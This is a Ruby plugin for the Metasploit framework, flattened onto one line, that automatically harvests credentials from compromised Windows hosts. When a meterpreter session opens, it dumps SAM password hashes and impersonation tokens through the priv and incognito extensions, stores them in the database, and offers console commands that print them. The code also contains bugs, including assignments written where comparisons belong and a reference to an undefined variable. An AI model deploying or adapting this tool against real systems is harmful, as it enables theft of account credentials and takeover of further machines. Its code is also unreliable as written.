# # $Id$ # # credcollect - tebo[at]attackresearch.com # # $Revision$ # module Msf class Plugin::CredCollect < Msf::Plugin include Msf::SessionEvent class CredCollectCommandDispatcher include Msf::Ui::Console::CommandDispatcher def name "credcollect" end def commands { "db_hashes" => "Dumps hashes collected in the database", "db_tokens" => "Dumps tokens collected in the database with host information" } end def cmd_db_hashes() if not self.framework.db.active print_error("Database not connected") return end framework.db.get_auth_info(:sname=>"smb").each do |auth| if auth.type = "smb_hash" print_line(auth.pass) end end end def cmd_db_tokens() if not self.framework.db.active print_error("Database not connected") return end framework.db.get_auth_info(:sname=>"smb").each do |auth| if auth.type = "token" print_line(auth.host.address + " - " + auth.pass) end end end end def on_session_open(session) return if not self.framework.db.active print_status("This is CredCollect, I have the conn!") if (session.type == "meterpreter") # Make sure we're rockin Priv and Incognito session.core.use("priv") session.core.use("incognito") # It wasn't me mom! Stinko did it! hashes = session.priv.sam_hashes # Target infos for the db record addr = session.sock.peerhost self.framework.db.report_host( :host => addr, :state => Msf::HostState::Alive ) # Record hashes to the running db instance hashes.each do |hash| data = {} data[:host] = addr data[:target_host] = host.address data[:proto] = 'smb' data[:user] = hash.user_name data[:hash] = hash.lanman + ":" + hash.ntlm data[:hash_string] = hash.hash_string self.framework.db.report_auth_info(data) end # Record user tokens tokens = session.incognito.incognito_list_tokens(0).values # Meh, tokens come to us as a formatted string tokens = tokens.join.strip!.split("\n") tokens.each do |token| data = {} data[:host] = addr data[:target_host] = addr data[:proto] = 'smb' data[:token] = token self.framework.db.report_auth_info(data) end end end def on_session_close(session,reason='') end def initialize(framework, opts) super self.framework.events.add_session_subscriber(self) add_console_dispatcher(CredCollectCommandDispatcher) end def cleanup self.framework.events.remove_session_subscriber(self) remove_console_dispatcher('credcollect') end def name "db_credcollect" end def desc "Automatically grabs hashes and tokens from meterpreter session events and stores them in the db" end end end